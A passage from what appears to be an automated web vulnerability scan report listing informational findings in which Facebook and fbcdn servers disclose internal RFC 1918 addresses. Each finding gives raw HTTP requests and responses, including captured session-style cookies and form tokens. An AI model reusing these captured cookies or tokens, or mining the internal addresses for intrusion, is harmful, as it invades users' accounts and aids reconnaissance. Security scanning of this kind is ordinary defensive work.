Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 08:53:03 GMT
X-FB-Server: 10.138.16.183
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

.PNG
.
...IHDR...d...d........g....PLTE......................fIDATx^...    .0.....Z......I.O../..Z.-.~t "{.P..w!.....    u#`*0.)..b..b.Xi'c(....b...%.`....S.}..]......#"<7.>..o|.....IEND.B`.

16.13. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yS/r/SakaC0tDjfm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.ak.fbcdn.net
Path:   /static-ak/rsrc.php/v1/yS/r/SakaC0tDjfm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static-ak/rsrc.php/v1/yS/r/SakaC0tDjfm.png HTTP/1.1
Host: profile.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 610
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:53:03 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Cache-Control: public, max-age=1085094
Expires: Sun, 28 Aug 2011 08:04:52 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

.PNG
.
...IHDR...2...2.....).x.....PLTE...............................................................................................................................................................
...[SNIP]...

16.14. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yb/r/OvXYjXPaGkl.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.ak.fbcdn.net
Path:   /static-ak/rsrc.php/v1/yb/r/OvXYjXPaGkl.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static-ak/rsrc.php/v1/yb/r/OvXYjXPaGkl.png HTTP/1.1
Host: profile.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1793
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 08:53:03 GMT
X-FB-Server: 10.138.16.184
Cache-Control: public, max-age=120992
Expires: Wed, 17 Aug 2011 04:16:30 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

.PNG
.
...IHDR...d...d.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx....o.F..=.....B.96[)..}h.}...|..j.v..*u....IHB...~6K.;.............<A..q..1.`).
....(,
....(,
....(,
."..(....}.......
...[SNIP]...

16.15. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yr/r/fwJFrO5KjAQ.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.ak.fbcdn.net
Path:   /static-ak/rsrc.php/v1/yr/r/fwJFrO5KjAQ.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static-ak/rsrc.php/v1/yr/r/fwJFrO5KjAQ.png HTTP/1.1
Host: profile.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1732
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 08:53:03 GMT
X-FB-Server: 10.138.64.182
Cache-Control: public, max-age=1209600
Expires: Mon, 29 Aug 2011 18:39:58 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

.PNG
.
...IHDR...d...d.....G<ef...@PLTE...............................................................................................................................................................
...[SNIP]...

16.16. http://pt-br.facebook.com/ajax/captcha/recaptcha_log_actions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /ajax/captcha/recaptcha_log_actions.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/captcha/recaptcha_log_actions.php?__a=1&action=shown&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F13.0.782.112%20Safari%2F535.1&location=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
X-SVN-Rev: 422152
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1; wd=1123x954

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.64.105.59
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:47 GMT

for (;;);{"__ar":1,"payload":null}

16.17. http://pt-br.facebook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Wed, 14 Sep 2011 18:39:58 GMT
X-FB-Server: 10.64.119.36
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:58 GMT
Content-Length: 152

.PNG
.
...IHDR................a..._IDAT8.c...?.%.LXG.8...I.g. U3..m@B.....}...$....,..5...\.h.@~G.?.?...h.\....m.......H....83Q...@..........IEND.B`.

16.18. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /people/Andr%C3%A9-Azevedo/1668500662

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /people/Andr%C3%A9-Azevedo/1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
Content-Length: 998
Cache-Control: max-age=0
Origin: http://pt-br.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1

post_form_id=208956c150919ab1cdeb13e59d929c7b&lsd=yxUAz&captcha_persist_data=AZn2Prk2YE02IBt6SralDuwZdXf9ZmW3h45Cn_PY4olwLPKhUXsCTDVn8L9HD-Vh3HuEMIvMMVmehaCRNynGK33nkkHNi9pP41mupKoNjo04_5AY6G12AqHHbwP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.166.91
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:57 GMT
Content-Length: 72641

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" xmlns:og="http://ogp.me/ns#" lang="pt" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...

16.19. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&cs=93q9Vfwh&su=fsY9Vfwe&page=Job%20Description&j=oRqPVfwL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "7feaa35fc9c562b7966dbe4b5bd22ca8"
X-FB-Server: 10.32.207.102
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=607
Expires: Mon, 15 Aug 2011 18:47:36 GMT
Date: Mon, 15 Aug 2011 18:37:29 GMT
Connection: close

/*1313018260,169922406,JIT Construction: v420556,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

16.20. http://static.ak.facebook.com/platform/page_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /platform/page_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /platform/page_proxy.php?v=4 HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 1161
Vary: Accept-Encoding
Cache-Control: public, max-age=78513
Expires: Tue, 16 Aug 2011 16:13:05 GMT
Date: Mon, 15 Aug 2011 18:24:32 GMT
Connection: close

<form method="post" id="proxy_form"><input type="hidden" autocomplete="off" id="signed_request" name="signed_request" /></form><script> document.domain = "facebook.com";
var frameName = window.loca
...[SNIP]...

16.21. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 2460
Vary: Accept-Encoding
Cache-Control: public, max-age=235
Expires: Mon, 15 Aug 2011 18:29:42 GMT
Date: Mon, 15 Aug 2011 18:25:47 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

16.22. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26c3945bc%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm&layout=standard&locale=en_US&node_type=link&ref=fbLike&sdk=joey&show_faces=false&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2460
Vary: Accept-Encoding
Cache-Control: public, max-age=701
Expires: Mon, 15 Aug 2011 18:57:50 GMT
Date: Mon, 15 Aug 2011 18:46:09 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

16.23. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ARVKHdmDbiC.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y-/r/ARVKHdmDbiC.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y-/r/ARVKHdmDbiC.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1136
Content-Type: image/png
Last-Modified: Sat, 06 Aug 2011 12:17:22 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Cache-Control: public, max-age=30883836
Expires: Tue, 07 Aug 2012 05:15:09 GMT
Date: Mon, 15 Aug 2011 18:24:33 GMT
Connection: close

.PNG
.
...IHDR...4...,......sD....7IDATx....J.I..q.).<@....GXB.`....|.o...C.. .W/    ....8...(...@..../..spk..........t.[..1..f..R=...?...j..8...............s....]....4.....%.n.)....V...1n...F.....
...[SNIP]...

16.24. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/_ev5gLu-ABH.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y0/r/_ev5gLu-ABH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y0/r/_ev5gLu-ABH.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 08 Aug 2011 04:07:41 GMT
X-FB-Server: 10.138.69.183
Content-Length: 12697
Vary: Accept-Encoding
Cache-Control: public, max-age=30883914
Expires: Tue, 07 Aug 2012 05:16:13 GMT
Date: Mon, 15 Aug 2011 18:24:19 GMT
Connection: close

/*1312780567,176833975*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
#captcha
...[SNIP]...

16.25. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/0KvtPpJJZJB.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/0KvtPpJJZJB.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/0KvtPpJJZJB.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 01:53:31 GMT
X-FB-Server: 10.138.64.186
Content-Length: 14465
Vary: Accept-Encoding
Cache-Control: public, max-age=26035489
Expires: Tue, 12 Jun 2012 02:44:13 GMT
Date: Mon, 15 Aug 2011 18:39:24 GMT
Connection: close

/*1307932980,176832698*/

if (window.CavalryLogger) { CavalryLogger.start_js(["LVwPS"]); }

function captchaRefresh(d,e,f,a,b){var c={new_captcha_type:d,id:f,t_auth_token:a};c.skipped_captcha_data=$('
...[SNIP]...

16.26. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/79x_K5xzjuK.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/79x_K5xzjuK.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/79x_K5xzjuK.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 874
Content-Type: image/png
Last-Modified: Wed, 03 Aug 2011 12:17:23 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Cache-Control: public, max-age=30883842
Expires: Tue, 07 Aug 2012 05:15:07 GMT
Date: Mon, 15 Aug 2011 18:24:25 GMT
Connection: close

.PNG
.
...IHDR.............u.!.....PLTE.........WWWJi.PPP......WWW......WWWPPP...WWWJi.WWWWWWWWW......WWWUUU...WWW...WWWWWWWWW...WWWWWWPPPRRR...Ji.WWW...BBBjjjUUU<<<Ji.;;;...PPPAAA..................
...[SNIP]...

16.27. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/RHjwNbYNCek.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/RHjwNbYNCek.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/RHjwNbYNCek.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 10 Aug 2011 19:41:47 GMT
X-FB-Server: 10.138.17.186
Content-Length: 145487
Vary: Accept-Encoding
Cache-Control: public, max-age=31109688
Expires: Thu, 09 Aug 2012 20:14:46 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

/*1313007344,176820666*/

if (window.CavalryLogger) { CavalryLogger.start_js(["bn+h6"]); }

var DOMScroll={getScrollState:function(){var d=Vector2.getViewportDimensions();var a=Vector2.getDocumentDime
...[SNIP]...

16.28. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/mVJg8S3A2Rm.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/mVJg8S3A2Rm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/mVJg8S3A2Rm.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 08 Aug 2011 04:06:35 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 21066
Vary: Accept-Encoding
Cache-Control: public, max-age=30882956
Expires: Tue, 07 Aug 2012 05:14:09 GMT
Date: Mon, 15 Aug 2011 18:38:13 GMT
Connection: close

/*1312780490,169775815*/

.async_throbber .async_saving{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}
.async_throbber_left .async_savi
...[SNIP]...

16.29. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/yCyTimbRkBE.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/yCyTimbRkBE.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

